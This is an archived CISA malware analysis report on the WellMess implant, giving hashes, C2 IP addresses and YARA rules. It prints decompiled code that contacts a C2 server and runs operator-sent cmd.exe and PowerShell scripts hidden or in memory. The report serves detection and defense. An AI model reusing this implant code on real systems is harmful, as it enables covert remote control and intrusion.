{
	"id": "230fe254-43fe-4472-9c47-407ca07d055a",
	"created_at": "2026-04-06T00:18:10.781086Z",
	"updated_at": "2026-04-10T03:37:16.845436Z",
	"deleted_at": null,
	"sha1_hash": "5efc88b09fcecce99d033cb200a80dcf53584f3b",
	"title": "MAR-10296782-2.v1 – WELLMESS | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176902,
	"plain_text": "MAR-10296782-2.v1 – WELLMESS | CISA\r\nPublished: 2020-07-16 · Archived: 2026-04-05 17:48:48 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security\r\nAgency (CISA). This malware has been identified as WELLMESS. Advanced persistent threat (APT) groups have been\r\nidentified using this malware. For more information regarding this malware, please visit:\r\nhttps://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development\r\nThis report analyzes six unique files. The files are variants of the malware family known as \"WellMess\". These implants\r\nallow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts\r\non an infected system.\r\nThe WellMess samples include one 32-bit Windows executable and five Executable and Linkable Format (ELF) files written\r\nin Go, an open source programming language. 
The report includes analysis of a compiled .NET application extracted from\r\none of the 32-bit Windows executables.\r\nThe ELF and 32-bit Windows executables have similar functionality; both collect the state of system privileges (disabled or\r\nenabled) from the infected system and encrypt the data via a Rivest cipher 6 (RC6) algorithm, then dynamically generate\r\nAdvanced Encryption Standard (AES) keys, which are exchanged via a Rivest–Shamir–Adleman (RSA) secured key\r\ntransfer scheme. Both versions also allow an operator to pass AES encrypted executable scripts to infected systems.\r\nFor a downloadable copy of IOCs, see MAR-10296782-2.v1.stix.\r\nSubmitted Files (6)\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 (14e9b5e214572cb13ff87727d68063...)\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb (5ca4a9f6553fea64ad2c724bf71d0f...)\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee (7c39841ba409bce4c2c35437ecf043...)\r\n953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a (953b5fc9977e2d50f3f72c6ce85e89...)\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 (e329607379a01483fc914a47c0062d...)\r\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 (fd3969d32398bbe3709e9da5f83269...)\r\nAdditional Files (1)\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 (WellMess.net.extract.bin)\r\nIPs (5)\r\n103.73.188.101\r\n141.98.212.55\r\n192.48.88.107\r\n209.58.186.196\r\n85.93.2.116\r\nFindings\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 1 of 44\n\n953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nTags\r\ntrojan\r\nDetails\r\nName 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nSize 172032 bytes\r\nType PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 f18ced8772e9d1a640b8b4a731dfb6e0\r\nSHA1 92f7b470c5a2c95a4df04c2c5cd50780f6dbdda1\r\nSHA256 
953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nSHA512 c4ac5332ee27b3da002c8a55a1e99aefeb503a69b8eb1ce9310bcb12131d56d2efe70f50942461ec9e7c628e3d1a5f13c92faa6bb6b1c263acbe4\r\nssdeep 1536:Lo7PHWHfGE50u3J0cMuNJdbOYOL68q4ATMMx4pnMgqZ5C/yOCy2UpiPKsNoeIlnt:E7PHwJdbJOOvkuC/yOH2CiP0ie1XF\r\nEntropy 3.887546\r\nAntivirus\r\nBitDefender Gen:Variant.Razy.279280\r\nClamAV Win.Trojan.WellMess-6706033-0\r\nEmsisoft Gen:Variant.Razy.279280 (B)\r\nMcAfee GenericRXEI-SR!F18CED8772E9\r\nNANOAV Trojan.Win32.WellMess.fignvr\r\nQuick Heal Trojan.Wellmess\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 2 of 44\n\nSHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n   
 SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 
0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 3 of 44\n\n$21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-28 07:14:10-04:00\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nCompany Name Microsoft Corporation\r\nFile Description Power Settings Command-Line Tool\r\nInternal Name powercfg.exe\r\nLegal Copyright © Microsoft Corporation. All rights reserved.\r\nOriginal Filename powercfg.exe\r\nProduct Name Microsoft® Windows® Operating System\r\nProduct Version 6.1.7600.16385 (win7_rtm.090713-1255)\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb90f84adffd98c3c63291dc54f766f18 header 4096 0.462120\r\n25e1daba00e54a31c1d9bb459988f669 .text 159744 4.056043\r\nbb5030c93de573a2819699404e0436be .rsrc 4096 2.256683\r\nf662c2f95c916d5bd4f0c939236a81e9 .reloc 4096 0.016408\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n953b5fc997... 
Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nDescription\r\nThis file is a malicious compiled .NET application. It decrypts and loads an embedded dynamic link library (DLL)\r\n\"WellMess.net.extract.bin\" (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854).\r\nScreenshots\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 4 of 44\n\nFigure 1 - Screenshot of the code structure which decrypts the embedded DLL.\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nTags\r\ntrojan\r\nDetails\r\nName WellMess.net.extract.bin\r\nSize 45056 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 507bb551bd7073f846760d8b357b7aa9\r\nSHA1 23033dcad2d60574ea8a65862431f46b950e54c3\r\nSHA256 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nSHA512 fbad8f6e4c2a49ad7e030bfc069b830027942383a5429ac129ba4880c7f90d9e1ec84186755cbb61c39b41096d7969fa5e1e7a13918d1677045f\r\nssdeep 768:vLTf79aYYuGhmohyWdDZo/G9sklJL+9Ok/JSbrvfMAQ:/fMtYG9PB+9OyYXHhQ\r\nEntropy 4.625315\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = 
\"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 5 of 44\n\nSHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 
5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 6 of 44\n\n$25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-27 09:22:21-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name Microsoft Corporation\r\nFile Description  \r\nInternal Name x643.Microsoft.Dtc.PowerShell.dll\r\nLegal Copyright Copyright (c) Microsoft 
Corporation. All rights reserved.\r\nOriginal Filename x643.Microsoft.Dtc.PowerShell.dll\r\nProduct Name Microsoft (R) Windows (R) Operating System\r\nProduct Version 10.0.14393.0\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n668481e5e1971f610581ea0b01b617b5 header 4096 0.434226\r\nced7014e20c39fba49386f6aef5e1203 .text 32768 5.701312\r\n1d4922f19bd3e79cfdf93cd91be7af27 .rsrc 4096 1.150437\r\nda55cd9f0f50ad5c82000ca03bfaa4be .reloc 4096 0.013127\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n47cdb87c27... Connected_To 85.93.2.116\r\n47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nDescription\r\nThis file is a compiled .NET application. It has been identified as a variant of the WellMess malware family. Displayed\r\nbelow is a function named “HXYGVr()” which was extracted from this application:\r\n—Begin Extracted Function—\r\npublic void HXYGVr()\r\n   {\r\n    Variable.url = \"hxxp[:]//85.93.2.116\";\r\n    string Address = \"\";\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 7 of 44\n\nVariable.proxy = !string.IsNullOrEmpty(Address) ? 
new WebProxy(Address) : (WebProxy) null;\r\n    Variable.serverType = \"GO\";\r\n    Variable.userAgent = \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\";\r\n    Variable.maxPostSize = 5000000;\r\n    Variable.keyRC6 = \"UJqqarUGKm1kR1mQMf5K2g==\";\r\n    Key publicKey;\r\n    publicKey.keySize = 2048;\r\n    publicKey.publicKey = \"\u003cRSAKeyValue\u003e\r\n\u003cModulus\u003e4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\";\r\n    Variable.interval = 12.0;\r\n    if (!this.IsInit)\r\n    {\r\n       Init init = new Init(publicKey);\r\n       this.Hash = Variable.hash;\r\n       this.Skey = Variable.keySymm;\r\n       this.IsInit = true;\r\n       this.Ua = Variable.userAgent;\r\n       this.MaxPostSize = Variable.maxPostSize;\r\n       this.HealthInterval = Variable.interval;\r\n    }\r\n    else\r\n    {\r\n       Variable.hash = this.Hash;\r\n       Variable.keySymm = this.Skey;\r\n       Variable.userAgent = this.Ua;\r\n       Variable.maxPostSize = this.MaxPostSize;\r\n       Variable.interval = this.HealthInterval;\r\n       Dictionary\u003cstring, string\u003e segmentsMessage = Chat.Download(Variable.hash, \"rc\", string.Empty);\r\n       if (segmentsMessage[\"head\"] == \"G\")\r\n       {\r\n        this.Complete = true;\r\n        if (!this.Hx)\r\n           return;\r\n        Chat.Send(Encoding.UTF8.GetBytes(\"Missed me?\"), Variable.keySymm, Variable.hash + \"/h\", \"a\", \"h\",\r\nVariable.maxPostSize);\r\n       }\r\n       else if (segmentsMessage[\"head\"] == \"C\")\r\n       {\r\n        new Chunks().Join((object) new ChatParameters()\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 8 of 44\n\n{\r\n           segmentsMessage = segmentsMessage\r\n        });\r\n        this.Complete = false;\r\n        Thread.Sleep(20000);\r\n       }\r\n       else 
if (segmentsMessage[\"service\"] == \"p\")\r\n       {\r\n        Init init = new Init(publicKey);\r\n        this.Hash = Variable.hash;\r\n        this.Skey = Variable.keySymm;\r\n        this.Complete = false;\r\n       }\r\n       else\r\n       {\r\n        new Choise().Work(segmentsMessage);\r\n        this.Complete = false;\r\n        this.Ua = Variable.userAgent;\r\n        this.MaxPostSize = Variable.maxPostSize;\r\n        this.HealthInterval = Variable.interval;\r\n       }\r\n    }\r\n—End Extracted Function—\r\nThis function appears to be the main export of the DLL, which initiates a C2 session with the implant's remote C2 server at\r\nthe Internet Protocol (IP) address, 85.93.2.116. Contained within the function is a public RSA key utilized by the malware to\r\nsecure communication with its C2 server. The function also contains an RC6 cryptographic key, which is utilized to secure\r\nstate information within the C2 sessions, such as a unique hash value which is generated to identify the unique target system.\r\nThe malware accepts and executes PowerShell and batch scripts from a remote operator on the infected system. These\r\nexecutable scripts will be provided within a C2 session that is secured with AES encryption. In addition, the AES key\r\ntransfer process between the implant and the remote operator will be encrypted utilizing RSA asymmetric cryptography,\r\nmaking malicious executable code traveling over the network difficult to detect. The function which\r\nprovides the script execution capability is illustrated below. 
Note: the execution of a script using this method will result in a\r\nseparate malicious process:\r\n—Begin Command Function—\r\npublic void Command(object message)\r\n   {\r\n    ChatParameters chatParameters = (ChatParameters) message;\r\n    try\r\n    {\r\n       string s = string.Empty;\r\n       Match match = new Regex(\"fileName:(?\u003cfn\u003e.*?)\\\\sargs:(?\u003carg\u003e.*)\\\\snotwait:(?\u003cnw\u003e.*)\", RegexOptions.IgnoreCase |\r\nRegexOptions.Multiline | RegexOptions.Singleline).Match(chatParameters.segmentsMessage[\"body\"]);\r\n       string str1 = match.Result(\"${fn}\").ToString();\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 9 of 44\n\nstring script = match.Result(\"${arg}\").ToString();\r\n       string str2 = match.Result(\"${nw}\").ToString();\r\n       Process process = new Process();\r\n       ProcessStartInfo processStartInfo = new ProcessStartInfo();\r\n       processStartInfo.CreateNoWindow = true;\r\n       processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;\r\n       processStartInfo.UseShellExecute = false;\r\n       processStartInfo.RedirectStandardOutput = true;\r\n       processStartInfo.FileName = str1;\r\n       if (str1 == \"powershellScript\")\r\n       {\r\n        s = BotChat.Pshell(script);\r\n       }\r\n       else\r\n       {\r\n        if (!string.IsNullOrEmpty(script))\r\n           processStartInfo.Arguments = !(str1 == \"cmd.exe\") ? 
script : \"/c \" + script;\r\n        process.StartInfo = processStartInfo;\r\n        process.Start();\r\n        if (string.IsNullOrEmpty(str2))\r\n        {\r\n           s = process.StandardOutput.ReadToEnd();\r\n           process.WaitForExit();\r\n        }\r\n       }\r\n       process.Close();\r\n       this.Reply(Encoding.UTF8.GetBytes(s), chatParameters.segmentsMessage[\"head\"],\r\nchatParameters.segmentsMessage[\"service\"]);\r\n    }\r\n    catch (Exception ex)\r\n    {\r\n       this.Reply(Encoding.UTF8.GetBytes(ex.Message.ToString()), chatParameters.segmentsMessage[\"head\"],\r\nchatParameters.segmentsMessage[\"service\"]);\r\n       Thread.Sleep(1000);\r\n    }\r\n   }\r\n—End Command Function—\r\nThe implant can also run PowerScripts scripts directly from memory. The malware contains the following function\r\nproviding this capability. Note: executing a PowerShell script using this method will not result in a separate malicious\r\nprocess.\r\n—Begin PowerShell Function—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 10 of 44\n\nprivate static string Pshell(string script)\r\n   {\r\n    string empty = string.Empty;\r\n    Collection\u003cPSObject\u003e collection;\r\n    using (Runspace runspace = RunspaceFactory.CreateRunspace())\r\n    {\r\n       try\r\n       {\r\n        runspace.Open();\r\n        using (PowerShell powerShell = PowerShell.Create())\r\n        {\r\n           powerShell.Runspace = runspace;\r\n           ScriptBlock scriptBlock = ScriptBlock.Create(script);\r\n           powerShell.AddCommand(\"Invoke-Command\").AddParameter(\"ScriptBlock\", (object) scriptBlock);\r\n           collection = powerShell.Invoke();\r\n        }\r\n       }\r\n       finally\r\n       {\r\n        runspace.Close();\r\n       }\r\n    }\r\n    foreach (PSObject psObject in collection)\r\n       empty += psObject.ToString();\r\n    return empty;\r\n   }\r\n—End PowerShell Function—\r\nDisplayed below is sample communication 
traffic between this WellMess implant and its C2 server.\r\n—Begin Sample Network Traffic—\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html, */*\r\nAccept-Language: en-US,en;q=0.8\r\nCookie:\r\n4NJZrNBl=80WOGU+5py+Cq0GVi+JMiq6ka+x%3aGeT+%3a7jpfqo+q1%3aa+6j9Delt+yDQ+SpTmS5+T5TpR.+DwUNdr+gjsJf+svT+Byw+sysM.+A\r\nHost: 85.93.2.116\r\nContent-Length: 798\r\nExpect: 100-continue\r\nAccept-Encoding: deflate\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 11 of 44\n\nConnection: Keep-Alive\r\nPXYaTG AoW 0gVV4R xKRORQU em5Jz OqxrlVM PweS oOVI30A 1oZ OgLqNp JyA1q. Dos2gp N0c3C q:d tKX IdNx.\r\nzkTbV QmOjB HXU::fP eUN4 jBOI. RlCFb xOTaSL C0k:BKg EGVy fsoDDZ. arfb ,2fvY xYlkGpW ,D6 ikXZ6. kJT\r\n6N82Au ,2Uf t7mOYW9 DLyAy. CF60ZX TIswg X7XBA: E6Xj2a unGhGIR. fir 1rH1jkG QPEc t1I53 iED. aomEaY\r\nn84rKx ECxZ0K yeDLh4 suZyqzp. ITxjQq b58:jvm lsOT AC,o mlM1. V3oUd U6bU:y8 WzJ8t pWUN76I KxnVY3.\r\nuUTz,K jDK qba yqU 1AvBN. pVg 3Duu 34IA g9jZc pr77J. 0h8lQGU lm3ReWd F2SB 7Yes fk1J. ndl8o tpzJ NhXH bjNO\r\n8nm:Aqm. l0HHBo dOypefA hja IAQ ,NUHFF7. yt, F:Gp OU1 S3e4GZ NU7HvZW. hAINPwR kDCE2Ev cQiiXU TXY\r\nKpt. prnvUns el4sMa 9do tw: eisS58C. d2wKh :T0F kxk mZTI jU1. 